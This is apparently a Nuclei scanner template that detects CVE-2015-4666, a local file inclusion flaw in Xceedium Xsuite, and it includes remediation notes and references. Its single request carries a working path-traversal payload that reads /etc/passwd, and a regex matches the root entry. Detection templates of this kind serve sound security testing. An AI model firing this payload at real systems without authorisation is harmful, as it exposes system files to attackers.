46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2015-4666
|
|
|
|
info:
|
|
name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
|
|
remediation: |
|
|
Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor.
|
|
reference:
|
|
- https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
|
|
- http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4666
|
|
- https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
|
|
- https://www.exploit-db.com/exploits/37708/
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2015-4666
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02372
|
|
epss-percentile: 0.88653
|
|
cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xceedium
|
|
product: xsuite
|
|
tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450220438588cd0e3d7e91b142697932cc5cc7307316fd8c2596516ccdd01fe0aa11d8022100aeac0a3f87b973ef927e0aed7a5966149f85cdf2e567528b5b6fe28a03f38465:922c64590222798bb761d5b6d8e72950
|